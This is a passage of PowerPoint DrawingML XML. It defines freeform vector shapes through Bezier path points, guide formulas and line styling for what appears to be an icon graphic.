                <a:gd name="T23" fmla="*/ 391 h 898"/>
                <a:gd name="T24" fmla="*/ 625 w 1134"/>
                <a:gd name="T25" fmla="*/ 891 h 898"/>
                <a:gd name="T26" fmla="*/ 607 w 1134"/>
                <a:gd name="T27" fmla="*/ 898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34" h="898">
                  <a:moveTo>
                    <a:pt x="607" y="898"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="898"/>
                    <a:pt x="594" y="896"/>
                    <a:pt x="589" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="881"/>
                    <a:pt x="579" y="865"/>
                    <a:pt x="589" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1071" y="373"/>
                    <a:pt x="1071" y="373"/>
                    <a:pt x="1071" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="761" y="64"/>
                    <a:pt x="761" y="64"/>
                    <a:pt x="761" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="779"/>
                    <a:pt x="45" y="779"/>
                    <a:pt x="45" y="779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="789"/>
                    <a:pt x="19" y="789"/>
                    <a:pt x="9" y="779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="770"/>
                    <a:pt x="0" y="754"/>
                    <a:pt x="9" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="743" y="10"/>
                    <a:pt x="743" y="10"/>
                    <a:pt x="743" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="769" y="0"/>
                    <a:pt x="779" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1125" y="356"/>
                    <a:pt x="1125" y="356"/>
                    <a:pt x="1125" y="356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="365"/>
                    <a:pt x="1134" y="382"/>
                    <a:pt x="1125" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="891"/>
                    <a:pt x="625" y="891"/>
                    <a:pt x="625" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="896"/>
                    <a:pt x="614" y="898"/>
                    <a:pt x="607" y="8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77" name="Line 279">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5738DB-D21B-FE4F-8EE6-AB8D7265F4D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8544744" y="3466126"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="555557"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>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78" name="Freeform 280">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897D2D9A-2448-6348-B22A-E5EDEF0DF33E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8563913" y="3447828"/>
              <a:ext cx="49667" cy="48795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 215"/>
                <a:gd name="T1" fmla="*/ 212 h 212"/>
                <a:gd name="T2" fmla="*/ 10 w 215"/>
                <a:gd name="T3" fmla="*/ 205 h 212"/>
                <a:gd name="T4" fmla="*/ 10 w 215"/>
                <a:gd name="T5" fmla="*/ 169 h 212"/>
                <a:gd name="T6" fmla="*/ 170 w 215"/>
                <a:gd name="T7" fmla="*/ 10 h 212"/>
                <a:gd name="T8" fmla="*/ 205 w 215"/>
                <a:gd name="T9" fmla="*/ 10 h 212"/>
                <a:gd name="T10" fmla="*/ 205 w 215"/>
                <a:gd name="T11" fmla="*/ 45 h 212"/>
                <a:gd name="T12" fmla="*/ 46 w 215"/>
                <a:gd name="T13" fmla="*/ 205 h 212"/>
                <a:gd name="T14" fmla="*/ 28 w 215"/>
                <a:gd name="T15" fmla="*/ 212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212">
                  <a:moveTo>
                    <a:pt x="28" y="212"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="212"/>
                    <a:pt x="15" y="210"/>
                    <a:pt x="10" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="179"/>
                    <a:pt x="10" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="10"/>
                    <a:pt x="170" y="10"/>
                    <a:pt x="170" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="0"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="205" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="20"/>
                    <a:pt x="215" y="36"/>
                    <a:pt x="205" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="205"/>
                    <a:pt x="46" y="205"/>
                    <a:pt x="46" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="210"/>
                    <a:pt x="34" y="212"/>
                    <a:pt x="28" y="2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79" name="Freeform 281">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0962B62C-663D-AA4E-B9D9-DC4C8E84944F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8523831" y="3485296"/>
              <a:ext cx="52281" cy="28755"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 229"/>
                <a:gd name="T1" fmla="*/ 125 h 125"/>
                <a:gd name="T2" fmla="*/ 5 w 229"/>
                <a:gd name="T3" fmla="*/ 109 h 125"/>
                <a:gd name="T4" fmla="*/ 19 w 229"/>
                <a:gd name="T5" fmla="*/ 76 h 125"/>
                <a:gd name="T6" fmla="*/ 190 w 229"/>
                <a:gd name="T7" fmla="*/ 6 h 125"/>
                <a:gd name="T8" fmla="*/ 223 w 229"/>
                <a:gd name="T9" fmla="*/ 19 h 125"/>
                <a:gd name="T10" fmla="*/ 210 w 229"/>
                <a:gd name="T11" fmla="*/ 52 h 125"/>
                <a:gd name="T12" fmla="*/ 38 w 229"/>
                <a:gd name="T13" fmla="*/ 123 h 125"/>
                <a:gd name="T14" fmla="*/ 28 w 229"/>
                <a:gd name="T15" fmla="*/ 125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9" h="125">
                  <a:moveTo>
                    <a:pt x="28" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="125"/>
                    <a:pt x="9" y="119"/>
                    <a:pt x="5" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="96"/>
                    <a:pt x="6" y="82"/>
                    <a:pt x="19" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="6"/>
                    <a:pt x="190" y="6"/>
                    <a:pt x="190" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="0"/>
                    <a:pt x="218" y="6"/>
                    <a:pt x="223" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="32"/>
                    <a:pt x="222" y="47"/>
                    <a:pt x="210" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="123"/>
                    <a:pt x="38" y="123"/>
                    <a:pt x="38" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="124"/>
                    <a:pt x="32" y="125"/>
                    <a:pt x="28"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80" name="Freeform 282">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F98A24-4F5C-D743-8086-66EB4A063010}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8502919" y="3500980"/>
              <a:ext cx="33983" cy="20912"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 145"/>
                <a:gd name="T1" fmla="*/ 90 h 90"/>
                <a:gd name="T2" fmla="*/ 5 w 145"/>
                <a:gd name="T3" fmla="*/ 74 h 90"/>
                <a:gd name="T4" fmla="*/ 19 w 145"/>
                <a:gd name="T5" fmla="*/ 41 h 90"/>
                <a:gd name="T6" fmla="*/ 107 w 145"/>
                <a:gd name="T7" fmla="*/ 5 h 90"/>
                <a:gd name="T8" fmla="*/ 140 w 145"/>
                <a:gd name="T9" fmla="*/ 19 h 90"/>
                <a:gd name="T10" fmla="*/ 126 w 145"/>
                <a:gd name="T11" fmla="*/ 52 h 90"/>
                <a:gd name="T12" fmla="*/ 38 w 145"/>
                <a:gd name="T13" fmla="*/ 88 h 90"/>
                <a:gd name="T14" fmla="*/ 29 w 145"/>
                <a:gd name="T15" fmla="*/ 9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90">
                  <a:moveTo>
                    <a:pt x="29" y="90"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="90"/>
                    <a:pt x="9" y="84"/>
                    <a:pt x="5" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61"/>
                    <a:pt x="6" y="47"/>
                    <a:pt x="19" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="5"/>
                    <a:pt x="107" y="5"/>
                    <a:pt x="107" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="0"/>
                    <a:pt x="134" y="6"/>
                    <a:pt x="140" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="32"/>
                    <a:pt x="139" y="47"/>
                    <a:pt x="126" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="88"/>
                    <a:pt x="38" y="88"/>
                    <a:pt x="38" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="89"/>
                    <a:pt x="32" y="90"/>
                    <a:pt x="29"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81" name="Freeform 283">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDCA856-AAFB-B342-97E8-2C06CBCF2026}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8427983" y="3406003"/>
              <a:ext cx="88006" cy="147258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 27 w 383"/>
                <a:gd name="T1" fmla="*/ 641 h 641"/>
                <a:gd name="T2" fmla="*/ 9 w 383"/>
                <a:gd name="T3" fmla="*/ 634 h 641"/>
                <a:gd name="T4" fmla="*/ 3 w 383"/>
                <a:gd name="T5" fmla="*/ 606 h 641"/>
                <a:gd name="T6" fmla="*/ 245 w 383"/>
                <a:gd name="T7" fmla="*/ 19 h 641"/>
                <a:gd name="T8" fmla="*/ 278 w 383"/>
                <a:gd name="T9" fmla="*/ 5 h 641"/>
                <a:gd name="T10" fmla="*/ 292 w 383"/>
                <a:gd name="T11" fmla="*/ 38 h 641"/>
                <a:gd name="T12" fmla="*/ 73 w 383"/>
                <a:gd name="T13" fmla="*/ 569 h 641"/>
                <a:gd name="T14" fmla="*/ 345 w 383"/>
                <a:gd name="T15" fmla="*/ 457 h 641"/>
                <a:gd name="T16" fmla="*/ 378 w 383"/>
                <a:gd name="T17" fmla="*/ 471 h 641"/>
                <a:gd name="T18" fmla="*/ 364 w 383"/>
                <a:gd name="T19" fmla="*/ 504 h 641"/>
                <a:gd name="T20" fmla="*/ 36 w 383"/>
                <a:gd name="T21" fmla="*/ 639 h 641"/>
                <a:gd name="T22" fmla="*/ 27 w 383"/>
                <a:gd name="T23"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3" h="641">
                  <a:moveTo>
                    <a:pt x="27" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="641"/>
                    <a:pt x="14" y="638"/>
                    <a:pt x="9" y="634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="626"/>
                    <a:pt x="0" y="615"/>
                    <a:pt x="3" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="19"/>
                    <a:pt x="245" y="19"/>
                    <a:pt x="245" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="6"/>
                    <a:pt x="265" y="0"/>
                    <a:pt x="278" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="10"/>
                    <a:pt x="297" y="25"/>
                    <a:pt x="292" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="569"/>
                    <a:pt x="73" y="569"/>
                    <a:pt x="73" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="457"/>
                    <a:pt x="345" y="457"/>
                    <a:pt x="345" y="457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="452"/>
                    <a:pt x="373" y="458"/>
                    <a:pt x="378" y="471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="484"/>
                    <a:pt x="377" y="499"/>
                    <a:pt x="364" y="504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="639"/>
                    <a:pt x="36" y="639"/>
                    <a:pt x="36" y="639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="640"/>
                    <a:pt x="30" y="641"/>
                    <a:pt x="27" y="6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82" name="Freeform 284">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FD7173-AD8C-8344-A93F-874AAED07F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8448024" y="3491395"/>
              <a:ext cx="41825" cy="41825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 154 w 182"/>
                <a:gd name="T1" fmla="*/ 179 h 179"/>
                <a:gd name="T2" fmla="*/ 136 w 182"/>
                <a:gd name="T3" fmla="*/ 171 h 179"/>
                <a:gd name="T4" fmla="*/ 10 w 182"/>
                <a:gd name="T5" fmla="*/ 45 h 179"/>
                <a:gd name="T6" fmla="*/ 10 w 182"/>
                <a:gd name="T7" fmla="*/ 10 h 179"/>
                <a:gd name="T8" fmla="*/ 46 w 182"/>
                <a:gd name="T9" fmla="*/ 10 h 179"/>
                <a:gd name="T10" fmla="*/ 172 w 182"/>
                <a:gd name="T11" fmla="*/ 136 h 179"/>
                <a:gd name="T12" fmla="*/ 172 w 182"/>
                <a:gd name="T13" fmla="*/ 171 h 179"/>
                <a:gd name="T14" fmla="*/ 154 w 182"/>
                <a:gd name="T15" fmla="*/ 179 h 1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179">
                  <a:moveTo>
                    <a:pt x="154" y="179"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="179"/>
                    <a:pt x="141" y="176"/>
                    <a:pt x="136" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="136"/>
                    <a:pt x="172" y="136"/>
                    <a:pt x="172" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="145"/>
                    <a:pt x="182" y="162"/>
                    <a:pt x="172" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="176"/>
                    <a:pt x="160" y="179"/>
                    <a:pt x="154"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83" name="Freeform 285">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26EF88E0-41A4-A14B-AC22-22A796370A75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8639720" y="3257874"/>
              <a:ext cx="45310" cy="44439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 27 w 197"/>
                <a:gd name="T1" fmla="*/ 194 h 194"/>
                <a:gd name="T2" fmla="*/ 10 w 197"/>
                <a:gd name="T3" fmla="*/ 187 h 194"/>
                <a:gd name="T4" fmla="*/ 10 w 197"/>
                <a:gd name="T5" fmla="*/ 151 h 194"/>
                <a:gd name="T6" fmla="*/ 151 w 197"/>
                <a:gd name="T7" fmla="*/ 9 h 194"/>
                <a:gd name="T8" fmla="*/ 187 w 197"/>
                <a:gd name="T9" fmla="*/ 9 h 194"/>
                <a:gd name="T10" fmla="*/ 187 w 197"/>
                <a:gd name="T11" fmla="*/ 45 h 194"/>
                <a:gd name="T12" fmla="*/ 45 w 197"/>
                <a:gd name="T13" fmla="*/ 187 h 194"/>
                <a:gd name="T14" fmla="*/ 27 w 197"/>
                <a:gd name="T15" fmla="*/ 194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 h="194">
                  <a:moveTo>
                    <a:pt x="27" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="194"/>
                    <a:pt x="15" y="192"/>
                    <a:pt x="10" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="177"/>
                    <a:pt x="0" y="161"/>
                    <a:pt x="10" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="9"/>
                    <a:pt x="151" y="9"/>
                    <a:pt x="151" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="0"/>
                    <a:pt x="177" y="0"/>
                    <a:pt x="187" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="19"/>
                    <a:pt x="197" y="35"/>
                    <a:pt x="187" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="187"/>
                    <a:pt x="45" y="187"/>
                    <a:pt x="45" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="34" y="194"/>
                    <a:pt x="27" y="1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84" name="Freeform 287">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8FFAF1-7A49-4E44-AB62-288F6ABD57C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8490720" y="3236962"/>
              <a:ext cx="174270" cy="195182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 87 w 757"/>
                <a:gd name="T1" fmla="*/ 845 h 845"/>
                <a:gd name="T2" fmla="*/ 25 w 757"/>
                <a:gd name="T3" fmla="*/ 819 h 845"/>
                <a:gd name="T4" fmla="*/ 0 w 757"/>
                <a:gd name="T5" fmla="*/ 758 h 845"/>
                <a:gd name="T6" fmla="*/ 25 w 757"/>
                <a:gd name="T7" fmla="*/ 696 h 845"/>
                <a:gd name="T8" fmla="*/ 711 w 757"/>
                <a:gd name="T9" fmla="*/ 10 h 845"/>
                <a:gd name="T10" fmla="*/ 747 w 757"/>
                <a:gd name="T11" fmla="*/ 10 h 845"/>
                <a:gd name="T12" fmla="*/ 747 w 757"/>
                <a:gd name="T13" fmla="*/ 46 h 845"/>
                <a:gd name="T14" fmla="*/ 61 w 757"/>
                <a:gd name="T15" fmla="*/ 732 h 845"/>
                <a:gd name="T16" fmla="*/ 50 w 757"/>
                <a:gd name="T17" fmla="*/ 758 h 845"/>
                <a:gd name="T18" fmla="*/ 61 w 757"/>
                <a:gd name="T19" fmla="*/ 783 h 845"/>
                <a:gd name="T20" fmla="*/ 112 w 757"/>
                <a:gd name="T21" fmla="*/ 783 h 845"/>
                <a:gd name="T22" fmla="*/ 580 w 757"/>
                <a:gd name="T23" fmla="*/ 316 h 845"/>
                <a:gd name="T24" fmla="*/ 616 w 757"/>
                <a:gd name="T25" fmla="*/ 316 h 845"/>
                <a:gd name="T26" fmla="*/ 616 w 757"/>
                <a:gd name="T27" fmla="*/ 352 h 845"/>
                <a:gd name="T28" fmla="*/ 148 w 757"/>
                <a:gd name="T29" fmla="*/ 819 h 845"/>
                <a:gd name="T30" fmla="*/ 87 w 757"/>
                <a:gd name="T31" fmla="*/ 845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7" h="845">
                  <a:moveTo>
                    <a:pt x="87" y="845"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="845"/>
                    <a:pt x="42" y="836"/>
                    <a:pt x="25" y="819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="803"/>
                    <a:pt x="0" y="781"/>
                    <a:pt x="0" y="758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="734"/>
                    <a:pt x="9" y="712"/>
                    <a:pt x="25" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="10"/>
                    <a:pt x="711" y="10"/>
                    <a:pt x="711" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="0"/>
                    <a:pt x="737" y="0"/>
                    <a:pt x="747" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="20"/>
                    <a:pt x="757" y="36"/>
                    <a:pt x="747" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="732"/>
                    <a:pt x="61" y="732"/>
                    <a:pt x="61" y="732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="739"/>
                    <a:pt x="50" y="748"/>
                    <a:pt x="50" y="758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="767"/>
                    <a:pt x="54" y="777"/>
                    <a:pt x="61" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="798"/>
                    <a:pt x="98" y="798"/>
                    <a:pt x="112" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="316"/>
                    <a:pt x="580" y="316"/>
                    <a:pt x="580" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="590" y="306"/>
                    <a:pt x="606" y="306"/>
                    <a:pt x="616" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626" y="326"/>
                    <a:pt x="626" y="342"/>
                    <a:pt x="616" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="819"/>
                    <a:pt x="148" y="819"/>
                    <a:pt x="148" y="819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="836"/>
                    <a:pt x="109" y="845"/>
                    <a:pt x="87" y="8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85" name="Freeform 289">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32C45BB1-B67B-8442-8A53-6018DF523ED9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8621422" y="3317997"/>
              <a:ext cx="121989" cy="121117"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 528"/>
                <a:gd name="T1" fmla="*/ 526 h 526"/>
                <a:gd name="T2" fmla="*/ 10 w 528"/>
                <a:gd name="T3" fmla="*/ 518 h 526"/>
                <a:gd name="T4" fmla="*/ 10 w 528"/>
                <a:gd name="T5" fmla="*/ 483 h 526"/>
                <a:gd name="T6" fmla="*/ 483 w 528"/>
                <a:gd name="T7" fmla="*/ 10 h 526"/>
                <a:gd name="T8" fmla="*/ 519 w 528"/>
                <a:gd name="T9" fmla="*/ 10 h 526"/>
                <a:gd name="T10" fmla="*/ 519 w 528"/>
                <a:gd name="T11" fmla="*/ 45 h 526"/>
                <a:gd name="T12" fmla="*/ 46 w 528"/>
                <a:gd name="T13" fmla="*/ 518 h 526"/>
                <a:gd name="T14" fmla="*/ 28 w 528"/>
                <a:gd name="T15" fmla="*/ 526 h 5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8" h="526">
                  <a:moveTo>
                    <a:pt x="28" y="526"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="526"/>
                    <a:pt x="15" y="523"/>
                    <a:pt x="10" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="508"/>
                    <a:pt x="0" y="492"/>
                    <a:pt x="10" y="483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="483" y="10"/>
                    <a:pt x="483" y="10"/>
                    <a:pt x="483" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="0"/>
                    <a:pt x="509" y="0"/>
                    <a:pt x="519" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="19"/>
                    <a:pt x="528" y="36"/>
                    <a:pt x="519" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="518"/>
                    <a:pt x="46" y="518"/>
                    <a:pt x="46" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="523"/>
                    <a:pt x="34" y="526"/>
                    <a:pt x="28" y="5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86" name="Freeform 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906001B2-BDC8-9846-856A-04D9BCCA13C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8548229" y="3297956"/>
              <a:ext cx="175141" cy="193439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 760"/>
                <a:gd name="T1" fmla="*/ 839 h 839"/>
                <a:gd name="T2" fmla="*/ 34 w 760"/>
                <a:gd name="T3" fmla="*/ 813 h 839"/>
                <a:gd name="T4" fmla="*/ 34 w 760"/>
                <a:gd name="T5" fmla="*/ 690 h 839"/>
                <a:gd name="T6" fmla="*/ 714 w 760"/>
                <a:gd name="T7" fmla="*/ 10 h 839"/>
                <a:gd name="T8" fmla="*/ 750 w 760"/>
                <a:gd name="T9" fmla="*/ 10 h 839"/>
